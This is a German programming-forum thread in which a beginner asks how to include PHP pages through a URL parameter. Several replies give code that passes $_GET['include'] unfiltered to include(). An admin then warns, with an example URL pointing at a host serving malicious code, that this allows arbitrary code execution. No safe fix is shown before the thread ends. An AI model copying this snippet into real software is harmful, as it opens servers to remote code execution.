Entfallener Befehl...

Fragen zu allen Themen rund ums Programmieren außerhalb von phpBB können hier gestellt werden - auch zu anderen Programmiersprachen oder Software wie Webservern und Editoren.
~Kami~
Mitglied
Beiträge: 12
Registriert: 19.12.2004 21:08
Wohnort: Dortmund

Entfallener Befehl...

Beitrag von ~Kami~ »

Hi zusammen ^^
Also ich hab mir mal vor einiger Zeit mit den PHP Grundkentnissen ausseinandergesetzt.
Gestern Abend wollte ich mir mal wieder eine kleine Seite basteln, musste aber feststellen dass ich vergessen hab wie man andere Seiten in einer Seite einbaut und weitere per Link einfügen kann.
Im kurzen ganzen, es soll den Effekt von include ("x.php"); haben aber auch per Link wie ...index.php?include=x.php abrufbar sein. Ich glaube das war irgendetwas mit content oder so bin mir aber nicht mehr ganz sicher. Wäre nett wenn mir da jemand weiterhelfen könnte ^^
Benutzeravatar
r4bbIt
Mitglied
Beiträge: 99
Registriert: 07.10.2003 17:32
Wohnort: Neuenkirchen City
Kontaktdaten:

Beitrag von r4bbIt »

meinst du sowas?

Code: Alles auswählen

if(isset($_GET['include']))
{
 include($_GET['include]);
}
Zuletzt geändert von r4bbIt am 19.12.2004 21:34, insgesamt 2-mal geändert.
~Kami~
Mitglied
Beiträge: 12
Registriert: 19.12.2004 21:08
Wohnort: Dortmund

Beitrag von ~Kami~ »

Erm ja...
Jetzt kommt der Noob an's Tageslicht Parse Error bin zu blöd das einzubauen :oops:
Lord_Femto
Mitglied
Beiträge: 701
Registriert: 19.12.2003 15:53
Wohnort: Berlin

Beitrag von Lord_Femto »

bist du nicht. r4bbIt hatte bloß ein flüchtigkeitsfehler.

Code: Alles auswählen

if(isset($_GET['include'])) 
{ 
 include($_GET['include']); 
}
Gruß Lord_Femto
visit - http://www.pandemicbrew.de
Project X
Benutzeravatar
kratzer54847
Mitglied
Beiträge: 3065
Registriert: 20.01.2003 16:34
Wohnort: Düsseldorf/Hannover/Berlin
Kontaktdaten:

Beitrag von kratzer54847 »

Code: Alles auswählen

if(isset($_GET['include'])) 
{ 
 include($_GET['include']); 
}
hoffe es funzt[/code]
Knowledge Base | MOD Datenbank | Boardsuche | HTML | PHP

Durch die richtige Verwendung dieser Links können viele Fragen beantwortet werden ;-)
~Kami~
Mitglied
Beiträge: 12
Registriert: 19.12.2004 21:08
Wohnort: Dortmund

Beitrag von ~Kami~ »

Kommt wohl von der Übermüdung. Habe bis gerade nicht gesehen, wo der Unterschied lag (bei bestimmt acht mal vergleichen...). Danke für die hilfe ^^
Btw. Hab schon ein nächtes Problem perat, das in einem neuen Thread wartet *schäm*
Benutzeravatar
Pyramide
Ehrenadmin
Beiträge: 12734
Registriert: 19.04.2001 02:00
Wohnort: Meschede

Beitrag von Pyramide »

Daß ich (sofern $_GET['include'] nicht gefiltert wird) damit per foo.php?include=http://meineseite/boesercode beliebigen Code auf eurem Server ausführen kann, ist euch aber hoffentlich bewusst...?
~Kami~
Mitglied
Beiträge: 12
Registriert: 19.12.2004 21:08
Wohnort: Dortmund

Beitrag von ~Kami~ »

Ja, aber gab es da nicht noch irgendwie eine Möglichkeit sich davor zu schützen?
Was ist wenn soetwas vorkommt? Wer übernimmt die Haftung?
Cojote
Mitglied
Beiträge: 40
Registriert: 14.10.2004 14:44

Beitrag von Cojote »

Du könntest das GET-Argument mit nem regulären Ausdruck überprüfen und gegebenenfalls ne Fehlermeldung ausgeben lassen.

Wenn das ganze stur hardgecodet ohne Überprüfung des Arguments geschieht ist es möglich jeden beliebigen PHP-Code auf der Maschine auszuführen.
Als Programmierer der eine solche Software zum Verkauf anbietet kann der Kunde Ansprüche an dich stellen, außer du schließt das vor dem Verkauf per Vertrag aus.

Es ist generell schlecht einen Navigationsmechanismus alleine über includes zu lösen.
~Kami~
Mitglied
Beiträge: 12
Registriert: 19.12.2004 21:08
Wohnort: Dortmund

Beitrag von ~Kami~ »

... Das hatte ich schonmal, wo dann die Fehlermeldung "hacking atemppt"(«stammt nicht von mir habe nur die Seite verwaltet ^^) erschien. Leider habe ich komplett vergessen wie das aufgebaut war, sonst hätte ich ja auch wohl kaum gefragt ;) ... wie gesagt, habe nur die untersten Grundkentnisse. Könnte mir da vielleicht jemand bei helfen mit der Überprüfung und der Fehlermeldung? ._.
Antworten

Zurück zu „Coding & Technik“